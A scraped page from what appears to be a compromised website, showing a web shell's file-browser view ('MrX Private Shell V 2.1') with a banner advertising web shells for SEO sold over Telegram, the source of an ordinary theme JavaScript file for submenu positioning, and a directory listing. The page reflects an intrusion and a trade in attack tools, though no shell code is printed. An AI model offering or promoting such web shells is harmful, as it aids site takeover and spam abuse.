__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { loadStyle } from '../helpers'
import { isTouchDevice } from './helpers/is-touch-device'
const mountPopper = (reference) => {
if (!reference.nextElementSibling) {
return
}
if (reference.nextElementSibling.popperMounted) {
return
}
reference.nextElementSibling.popperMounted = true
// Prevent focus on click for non-touch devices when element is tabbable
// but not clickable.
if (!isTouchDevice() && reference.tabIndex === 0) {
reference.addEventListener('mousedown', (e) => {
e.preventDefault()
})
}
const target = reference.nextElementSibling
const referenceRect = reference.getBoundingClientRect()
const targetRect = target.getBoundingClientRect()
let initialPlacement =
referenceRect.left > innerWidth / 2 ? 'left' : 'right'
let placement = initialPlacement
const offset = parseFloat(
getComputedStyle(target).getPropertyValue(
'--theme-submenu-inline-offset'
) || -20
)
if (targetRect.width > innerWidth - referenceRect.left + offset) {
placement = 'left'
}
if (referenceRect.right - offset - targetRect.width < 0) {
placement = 'right'
}
if (
referenceRect.left + targetRect.width > innerWidth &&
referenceRect.right - targetRect.width < 0
) {
placement = initialPlacement
let offset = 0
let edgeOffset = 20
if (placement === 'left') {
offset = innerWidth - referenceRect.right - edgeOffset
}
if (placement === 'right') {
offset = referenceRect.left - edgeOffset
}
offset = Math.round(offset)
target.style.setProperty(
'--theme-submenu-inline-offset',
`${offset * -1}px`
)
}
target.dataset.placement = placement
const observer = new MutationObserver((mutations) => {
const maybeMutation = mutations.find(
(mutation) =>
mutation.type === 'childList' &&
[...mutation.removedNodes].find((el) => el === target)
)
if (!maybeMutation) {
return
}
observer.disconnect()
mountPopper(reference)
})
observer.observe(target.parentNode, { childList: true })
}
export const mount = (reference) => {
Promise.all(
ct_localizations.dynamic_styles_selectors
.filter(
(styleDescriptor) =>
!!reference.closest(styleDescriptor.selector)
)
.map(({ url }) => loadStyle(url))
).then(() => mountPopper(reference))
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| dynamic-chunks | Folder | 0750 |
|
|
| entry-points | Folder | 0750 |
|
|
| header | Folder | 0750 |
|
|
| helpers | Folder | 0750 |
|
|
| integration | Folder | 0750 |
|
|
| layouts | Folder | 0750 |
|
|
| lazy | Folder | 0750 |
|
|
| parallax | Folder | 0750 |
|
|
| search | Folder | 0750 |
|
|
| woocommerce | Folder | 0750 |
|
|
| animated-element.js | File | 761 B | 0640 |
|
| back-to-top-link.js | File | 2.24 KB | 0640 |
|
| fast-overlay.js | File | 2.16 KB | 0640 |
|
| flexy.js | File | 3.75 KB | 0640 |
|
| generic-accordion.js | File | 4.65 KB | 0640 |
|
| handle-3rd-party-events.js | File | 1.03 KB | 0640 |
|
| popper-elements.js | File | 2.21 KB | 0640 |
|
| search-implementation.js | File | 9.04 KB | 0640 |
|
| social-buttons.js | File | 2.71 KB | 0640 |
|